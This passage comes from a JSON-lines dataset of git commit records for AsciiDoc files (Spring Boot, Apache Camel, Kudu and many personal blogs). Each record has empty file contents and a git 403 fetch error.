boot,jmnarloch\/spring-boot,ihoneymon\/spring-boot,nebhale\/spring-boot,mdeinum\/spring-boot,shakuzen\/spring-boot,eddumelendez\/spring-boot,bclozel\/spring-boot,mbenson\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,rajendra-chola\/jenkins2-course-spring-boot,mbenson\/spring-boot,michael-simons\/spring-boot,dreis2211\/spring-boot,lenicliu\/spring-boot,brettwooldridge\/spring-boot,ollie314\/spring-boot,dfa1\/spring-boot,pvorb\/spring-boot,izeye\/spring-boot,sebastiankirsch\/spring-boot,thomasdarimont\/spring-boot,shangyi0102\/spring-boot,tiarebalbi\/spring-boot,lexandro\/spring-boot,jvz\/spring-boot,NetoDevel\/spring-boot,javyzheng\/spring-boot,herau\/spring-boot,rweisleder\/spring-boot,tsachev\/spring-boot,jayarampradhan\/spring-boot,ihoneymon\/spring-boot,akmaharshi\/jenkins,RichardCSantana\/spring-boot,spring-projects\/spring-boot,lenicliu\/spring-boot,cleverjava\/jenkins2-course-spring-boot,lenicliu\/spring-boot,rweisleder\/spring-boot,felipeg48\/spring-boot,bjornlindstrom\/spring-boot,jmnarloch\/spring-boot,jvz\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,zhangshuangquan\/spring-root,tsachev\/spring-boot,sbcoba\/spring-boot,philwebb\/spring-boot,ameraljovic\/spring-boot,neo4j-contrib\/spring-boot,eddumelendez\/spring-boot,michael-simons\/spring-boot,herau\/spring-boot,rweisleder\/spring-boot,linead\/spring-boot,eddumelendez\/spring-boot,izeye\/spring-boot,i007422\/jenkins2-course-spring-boot,habuma\/spring-boot,thomasdarimont\/spring-boot,qerub\/spring-boot,mdeinum\/spring-boot,felipeg48\/spring-boot,drumonii\/spring-boot,cleverjava\/jenkins2-course-spring-boot,lenicliu\/spring-boot,bjornlindstrom\/spring-boot,wilkinsona\/spring-boot,sbuettner\/spring-boot,RichardCSantana\/spring-boot,jvz\/spring-boot,SaravananParthasarathy\/SPSDemo,yangdd1205\/spring-boot,deki\/spring-boot,mdeinum\/spring-boot,dfa1\/spring-boot,jbovet\/spring-boot,jbovet\/spring-boot,scottfrederick\/spring-boot,mbogoevici\/spring-boot,xiaoleiPENG\/my-project,tsachev\/spring-boot,mbenson\/spring-boot,chrylis\/spring-boot,kdvolder\/spring-boot,thomasdarimont\/spring-boot,tiarebalbi\/spring-boot,wilkinsona\/spring-boot,bjornlindstrom\/spring-boot,akmaharshi\/jenkins,nebhale\/spring-boot,yangdd1205\/spring-boot,Nowheresly\/spring-boot,afroje-reshma\/spring-boot-sample,joshiste\/spring-boot,shakuzen\/spring-boot,sebastiankirsch\/spring-boot,vpavic\/spring-boot,sbcoba\/spring-boot,izeye\/spring-boot,aahlenst\/spring-boot,scottfrederick\/spring-boot,pvorb\/spring-boot,scottfrederick\/spring-boot,candrews\/spring-boot,shakuzen\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,neo4j-contrib\/spring-boot,Buzzardo\/spring-boot,zhangshuangquan\/spring-root,SaravananParthasarathy\/SPSDemo,sebastiankirsch\/spring-boot,jbovet\/spring-boot,herau\/spring-boot,dfa1\/spring-boot,Nowheresly\/spring-boot,isopov\/spring-boot,shakuzen\/spring-boot,dreis2211\/spring-boot,Nowheresly\/spring-boot,minmay\/spring-boot,htynkn\/spring-boot,candrews\/spring-boot,chrylis\/spring-boot,olivergierke\/spring-boot,htynkn\/spring-boot,akmaharshi\/jenkins,linead\/spring-boot,bclozel\/spring-boot,dreis2211\/spring-boot,spring-projects\/spring-boot,RichardCSantana\/spring-boot,ilayaperumalg\/spring-boot,michael-simons\/spring-boot,zhanhb\/spring-boot,shangyi0102\/spring-boot,ptahchiev\/spring-boot,mbenson\/spring-boot,thomasdarimont\/spring-boot,wilkinsona\/spring-boot,ameraljovic\/spring-boot,jvz\/spring-boot,DeezCashews\/spring-boot,vakninr\/spring-boot,jbovet\/spring-boot,lburgazzoli\/spring-boot,joshiste\/spring-boot,bclozel\/spring-boot,lburgazzoli\/spring-boot,shakuzen\/spring-boot,mbenson\/spring-boot,tiarebalbi\/spring-boot,royclarkson\/spring-boot,habuma\/spring-boot,jvz\/spring-boot,tsachev\/spring-boot,hqrt\/jenkins2-course-spring-boot,lexandro\/spring-boot,chrylis\/spring-boot,joshthornhill\/spring-boot,lburgazzoli\/spring-boot,philwebb\/spring-boot-concourse,drumonii\/spring-boot,afroje-reshma\/spring-boot-sample,DeezCashews\/spring-boot,dreis2211\/spring-boot,mbogoevici\/spring-boot,jxblum\/spring-boot,ihoneymon\/spring-boot,philwebb\/spring-boot,sbuettner\/spring-boot,zhanhb\/spring-boot,mosoft521\/spring-boot,Nowheresly\/spring-boot,xiaoleiPENG\/my-project,chrylis\/spring-boot,michael-simons\/spring-boot,htynkn\/spring-boot,zhangshuangquan\/spring-root,aahlenst\/spring-boot,mosoft521\/spring-boot,vpavic\/spring-boot,hello2009chen\/spring-boot,htynkn\/spring-boot,minmay\/spring-boot,zhangshuangquan\/spring-root,ilayaperumalg\/spring-boot,tiarebalbi\/spring-boot,joansmith\/spring-boot,zhanhb\/spring-boot,minmay\/spring-boot,joansmith\/spring-boot,RichardCSantana\/spring-boot,drumonii\/spring-boot,habuma\/spring-boot,xiaoleiPENG\/my-project,eddumelendez\/spring-boot,hqrt\/jenkins2-course-spring-boot,mosoft521\/spring-boot,yhj630520\/spring-boot,olivergierke\/spring-boot,joshthornhill\/spring-boot,isopov\/spring-boot,mrumpf\/spring-boot,afroje-reshma\/spring-boot-sample,vakninr\/spring-boot,bbrouwer\/spring-boot,scottfrederick\/spring-boot,mbogoevici\/spring-boot,jayarampradhan\/spring-boot,vpavic\/spring-boot,isopov\/spring-boot,yhj630520\/spring-boot,Buzzardo\/spring-boot,jxblum\/spring-boot,jmnarloch\/spring-boot,pvorb\/spring-boot,pvorb\/spring-boot,kamilszymanski\/spring-boot,linead\/spring-boot,javyzheng\/spring-boot,felipeg48\/spring-boot,michael-simons\/spring-boot,bjornlindstrom\/spring-boot,bijukunjummen\/spring-boot,hqrt\/jenkins2-course-spring-boot,jmnarloch\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,habuma\/spring-boot,DeezCashews\/spring-boot,NetoDevel\/spring-boot,kdvolder\/spring-boot,joshthornhill\/spring-boot,kdvolder\/spring-boot,pvorb\/spring-boot,ilayaperumalg\/spring-boot,isopov\/spring-boot,lucassaldanha\/spring-boot,yhj630520\/spring-boot,felipeg48\/spring-boot,tsachev\/spring-boot,jayarampradhan\/spring-boot,bclozel\/spring-boot,i007422\/jenkins2-course-spring-boot,zhanhb\/spring-boot,NetoDevel\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,javyzheng\/spring-boot,bjornlindstrom\/spring-boot,vpavic\/spring-boot,isopov\/spring-boot,lburgazzoli\/spring-boot,eddumelendez\/spring-boot,Buzzardo\/spring-boot,ollie314\/spring-boot,hqrt\/jenkins2-course-spring-boot,hqrt\/jenkins2-course-spring-boot,aahlenst\/spring-boot,jxblum\/spring-boot,ptahchiev\/spring-boot,bijukunjummen\/spring-boot,vakninr\/spring-boot,bijukunjummen\/spring-boot,donhuvy\/spring-boot,dreis2211\/spring-boot,herau\/spring-boot,spring-projects\/spring-boot,candrews\/spring-boot,linead\/spring-boot,philwebb\/spring-boot,philwebb\/spring-boot,vakninr\/spring-boot,joshthornhill\/spring-boot,zhanhb\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,lexandro\/spring-boot,shangyi0102\/spring-boot,ptahchiev\/spring-boot,mosoft521\/spring-boot,SaravananParthasarathy\/SPSDemo,akmaharshi\/jenkins,bbrouwer\/spring-boot,tsachev\/spring-boot,joshiste\/spring-boot,spring-projects\/spring-boot,afroje-reshma\/spring-boot-sample,Nowheresly\/spring-boot,ollie314\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,hello2009chen\/spring-boot,donhuvy\/spring-boot,ptahchiev\/spring-boot,Buzzardo\/spring-boot,drumonii\/spring-boot,sbuettner\/spring-boot,herau\/spring-boot,aahlenst\/spring-boot,SaravananParthasarathy\/SPSDemo,michael-simons\/spring-boot,sbuettner\/spring-boot,spring-projects\/spring-boot,neo4j-contrib\/spring-boot,royclarkson\/spring-boot,mrumpf\/spring-boot,donhuvy\/spring-boot,philwebb\/spring-boot-concourse,bbrouwer\/spring-boot,jxblum\/spring-boot,lburgazzoli\/spring-boot,mdeinum\/spring-boot,sebastiankirsch\/spring-boot,ihoneymon\/spring-boot,hello2009chen\/spring-boot,lucassaldanha\/spring-boot,brettwooldridge\/spring-boot,bbrouwer\/spring-boot,Buzzardo\/spring-boot,yhj630520\/spring-boot,DeezCashews\/spring-boot,donhuvy\/spring-boot,bbrouwer\/spring-boot,mosoft521\/spring-boot,lexandro\/spring-boot,wilkinsona\/spring-boot,deki\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ameraljovic\/spring-boot,lucassaldanha\/spring-boot,ilayaperumalg\/spring-boot,kdvolder\/spring-boot,kamilszymanski\/spring-boot,vpavic\/spring-boot,shakuzen\/spring-boot,sbcoba\/spring-boot,eddumelendez\/spring-boot,drumonii\/spring-boot,ptahchiev\/spring-boot,cleverjava\/jenkins2-course-spring-boot,izeye\/spring-boot,mdeinum\/spring-boot,NetoDevel\/spring-boot,olivergierke\/spring-boot,lenicliu\/spring-boot,joshthornhill\/spring-boot,nebhale\/spring-boot,Buzzardo\/spring-boot,dreis2211\/spring-boot,qerub\/spring-boot,sbcoba\/spring-boot,chrylis\/spring-boot,joansmith\/spring-boot,joshiste\/spring-boot,nebhale\/spring-boot,deki\/spring-boot,mrumpf\/spring-boot,i007422\/jenkins2-course-spring-boot,hello2009chen\/spring-boot,i007422\/jenkins2-course-spring-boot,joshiste\/spring-boot,felipeg48\/spring-boot,thomasdarimont\/spring-boot,royclarkson\/spring-boot,zhangshuangquan\/spring-root,joansmith\/spring-boot,mbogoevici\/spring-boot,rweisleder\/spring-boot,minmay\/spring-boot,mrumpf\/spring-boot,qerub\/spring-boot,javyzheng\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,zhanhb\/spring-boot,drumonii\/spring-boot,philwebb\/spring-boot-concourse,chrylis\/spring-boot,brettwooldridge\/spring-boot,i007422\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,ameraljovic\/spring-boot,felipeg48\/spring-boot,mdeinum\/spring-boot,rweisleder\/spring-boot,joansmith\/spring-boot,wilkinsona\/spring-boot,candrews\/spring-boot,isopov\/spring-boot,aahlenst\/spring-boot,jayarampradhan\/spring-boot,mbenson\/spring-boot,ollie314\/spring-boot,aahlenst\/spring-boot,ihoneymon\/spring-boot,bclozel\/spring-boot,olivergierke\/spring-boot,kamilszymanski\/spring-boot,neo4j-contrib\/spring-boot,donhuvy\/spring-boot,dfa1\/spring-boot,habuma\/spring-boot,lucassaldanha\/spring-boot,cleverjava\/jenkins2-course-spring-boot,olivergierke\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a3e0ed6c0ea24cb3f18f9401d15f0be93a1a975","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da5b8360c935a380a3631dc101c92e6990ba1d63","subject":"Update 2016-07-24-Forensic-Sasser-worm.adoc","message":"Update 2016-07-24-Forensic-Sasser-worm.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-07-24-Forensic-Sasser-worm.adoc","new_file":"_posts\/2016-07-24-Forensic-Sasser-worm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a1051f1b2def85295b84938c834c70393df166c","subject":"Upd link","message":"Upd link\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98f290004472f40712bc7021bb7b69a54af1aa69","subject":"Update 2018-04-07-search.adoc","message":"Update 2018-04-07-search.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-04-07-search.adoc","new_file":"_posts\/2018-04-07-search.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85d8964b38b19a51d610f5dd7e9812f542f2acb6","subject":"Update 2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","message":"Update 2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","new_file":"_posts\/2017-04-16-Predict-Survival-Propensity-of-Titanic-Passengers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roobyz\/roobyz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5efe4b4e68dcaf1e1fc369f0adb5e8545695f57","subject":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","message":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff32c45cf6cd3dc5ff6dca0ccf6b39bbe2cce9a8","subject":"Added Milestone 02 documentation","message":"Added Milestone 02 documentation\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/milestones\/milestone_2\/Flujos Milestone 02.asciidoc","new_file":"fermat-documentation\/milestones\/milestone_2\/Flujos Milestone 02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fcc026ac076b8a1ce245dcb43897e8e2de28e5d7","subject":"Update 2015-08-13-Characteristics-of-Commercial-Open-Source-and-DIY-Drones.adoc","message":"Update 2015-08-13-Characteristics-of-Commercial-Open-Source-and-DIY-Drones.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-08-13-Characteristics-of-Commercial-Open-Source-and-DIY-Drones.adoc","new_file":"_posts\/2015-08-13-Characteristics-of-Commercial-Open-Source-and-DIY-Drones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bcfad165d42a9a497d64bcde8f715b3a40ef4f8","subject":"service registry doc","message":"service registry doc\n","repos":"tdiesler\/camel,cunningt\/camel,adessaigne\/camel,christophd\/camel,tadayosi\/camel,DariusX\/camel,alvinkwekel\/camel,tdiesler\/camel,cunningt\/camel,pmoerenhout\/camel,zregvart\/camel,anoordover\/camel,jamesnetherton\/camel,gnodet\/camel,sverkera\/camel,kevinearls\/camel,gnodet\/camel,jamesnetherton\/camel,sverkera\/camel,christophd\/camel,tadayosi\/camel,anoordover\/camel,apache\/camel,objectiser\/camel,kevinearls\/camel,ullgren\/camel,adessaigne\/camel,zregvart\/camel,sverkera\/camel,zregvart\/camel,ullgren\/camel,onders86\/camel,tdiesler\/camel,kevinearls\/camel,christophd\/camel,tdiesler\/camel,mcollovati\/camel,Fabryprog\/camel,kevinearls\/camel,pax95\/camel,punkhorn\/camel-upstream,DariusX\/camel,apache\/camel,pax95\/camel,pmoerenhout\/camel,nicolaferraro\/camel,nicolaferraro\/camel,adessaigne\/camel,kevinearls\/camel,gnodet\/camel,dmvolod\/camel,christophd\/camel,sverkera\/camel,davidkarlsen\/camel,CodeSmell\/camel,dmvolod\/camel,objectiser\/camel,akhettar\/camel,alvinkwekel\/camel,gnodet\/camel,jamesnetherton\/camel,Fabryprog\/camel,pmoerenhout\/camel,apache\/camel,pax95\/camel,pax95\/camel,tadayosi\/camel,tadayosi\/camel,dmvolod\/camel,mcollovati\/camel,gnodet\/camel,nikhilvibhav\/camel,onders86\/camel,alvinkwekel\/camel,nicolaferraro\/camel,pax95\/camel,akhettar\/camel,CodeSmell\/camel,tdiesler\/camel,davidkarlsen\/camel,ullgren\/camel,adessaigne\/camel,jamesnetherton\/camel,ullgren\/camel,onders86\/camel,DariusX\/camel,akhettar\/camel,sverkera\/camel,adessaigne\/camel,christophd\/camel,nikhilvibhav\/camel,Fabryprog\/camel,mcollovati\/camel,DariusX\/camel,tdiesler\/camel,nikhilvibhav\/camel,anoordover\/camel,anoordover\/camel,onders86\/camel,apache\/camel,onders86\/camel,akhettar\/camel,akhettar\/camel,kevinearls\/camel,apache\/camel,adessaigne\/camel,punkhorn\/camel-upstream,cunningt\/camel,jamesnetherton\/camel,objectiser\/camel,pmoerenhout\/camel,CodeSmell\/camel,cunningt\/camel,jamesnetherton\/camel,cunningt\/camel,anoordover\/camel,nicolaferraro\/camel,apache\/camel,nikhilvibhav\/camel,cunningt\/camel,Fabryprog\/camel,onders86\/camel,pax95\/camel,objectiser\/camel,dmvolod\/camel,pmoerenhout\/camel,davidkarlsen\/camel,tadayosi\/camel,punkhorn\/camel-upstream,dmvolod\/camel,tadayosi\/camel,sverkera\/camel,davidkarlsen\/camel,alvinkwekel\/camel,zregvart\/camel,dmvolod\/camel,anoordover\/camel,CodeSmell\/camel,mcollovati\/camel,pmoerenhout\/camel,christophd\/camel,punkhorn\/camel-upstream,akhettar\/camel","old_file":"camel-core\/src\/main\/docs\/service-registry.adoc","new_file":"camel-core\/src\/main\/docs\/service-registry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1078215e5912fccdef3253158b14d61b795950fa","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdd8e484d48b927f56b1379abddb2568cac47941","subject":"KUDU-1822. Update docs to build the documentation in ubuntu","message":"KUDU-1822. Update docs to build the documentation in ubuntu\n\nInclude two packages, gem and ruby-dev, in the instruction to\nbuild documentations for Ubutnu.\n\nChange-Id: I474a0ffd61b4c50b0c0b5885a4e615679b4ae630\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/5608\nTested-by: Kudu Jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9fde224838132797b9d75c8032c996749a9a2073","subject":"Update 2016-09-05-Test.adoc","message":"Update 2016-09-05-Test.adoc","repos":"rushil-patel\/rushil-patel.github.io,rushil-patel\/rushil-patel.github.io,rushil-patel\/rushil-patel.github.io,rushil-patel\/rushil-patel.github.io","old_file":"_posts\/2016-09-05-Test.adoc","new_file":"_posts\/2016-09-05-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rushil-patel\/rushil-patel.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0377ba5fef61d09135276b696d9ce29893599705","subject":"Update 2017-10-21-TEST.adoc","message":"Update 2017-10-21-TEST.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2017-10-21-TEST.adoc","new_file":"_posts\/2017-10-21-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17d2d094faa656765375844b97795ab2daf9e75a","subject":"Update 2017-09-17-mixed-content-checker.adoc","message":"Update 2017-09-17-mixed-content-checker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b4fb39bd6e477cec7c228e461ad7be4caff5862","subject":"Update 2017-09-17-mixed-content-checker.adoc","message":"Update 2017-09-17-mixed-content-checker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45ffa25e9b377a9013c838be06fddfaf98cc4675","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e3566ea0b280758189e407cbda8a35ba61f3be3e","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9dbd75e7b3d873a57a7b5aa4ca02a3d6d2840106","subject":"Update 2017-06-13-Your-Blog-title.adoc","message":"Update 2017-06-13-Your-Blog-title.adoc","repos":"zakkum42\/zakkum42.github.io,zakkum42\/zakkum42.github.io,zakkum42\/zakkum42.github.io,zakkum42\/zakkum42.github.io","old_file":"_posts\/2017-06-13-Your-Blog-title.adoc","new_file":"_posts\/2017-06-13-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zakkum42\/zakkum42.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"471c7417bf03fab2ec1c53851eaf8881823c7e7d","subject":"Update 2017-08-09-Your-Blog-title.adoc","message":"Update 2017-08-09-Your-Blog-title.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-08-09-Your-Blog-title.adoc","new_file":"_posts\/2017-08-09-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a8c2914eeb1b7c198136bc02c394ba8c3ea2cfd","subject":"Update 2017-11-12-.adoc","message":"Update 2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3993b5dece6286d5fe1e1276814cc305ed3f8a4e","subject":"Update 2015-07-01-Welcome.adoc","message":"Update 2015-07-01-Welcome.adoc","repos":"mathieu-pousse\/hubpress.io,mathieu-pousse\/hubpress.io,mathieu-pousse\/hubpress.io","old_file":"_posts\/2015-07-01-Welcome.adoc","new_file":"_posts\/2015-07-01-Welcome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mathieu-pousse\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0e2430e5791247184061f5ef295a784ddda4af1","subject":"Update 2016-02-26-One-Two.adoc","message":"Update 2016-02-26-One-Two.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-One-Two.adoc","new_file":"_posts\/2016-02-26-One-Two.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"133e9361459f54ddf0bb30302ad2cb7d6734f6ed","subject":"Update dbm-list-locks.adoc","message":"Update dbm-list-locks.adoc","repos":"jako512\/grails-database-migration,sbglasius\/grails-database-migration","old_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-list-locks.adoc","new_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-list-locks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jako512\/grails-database-migration.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"45965e9aff0bf7f933508fd9f81eef2ef375bbc8","subject":"Update 2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","message":"Update 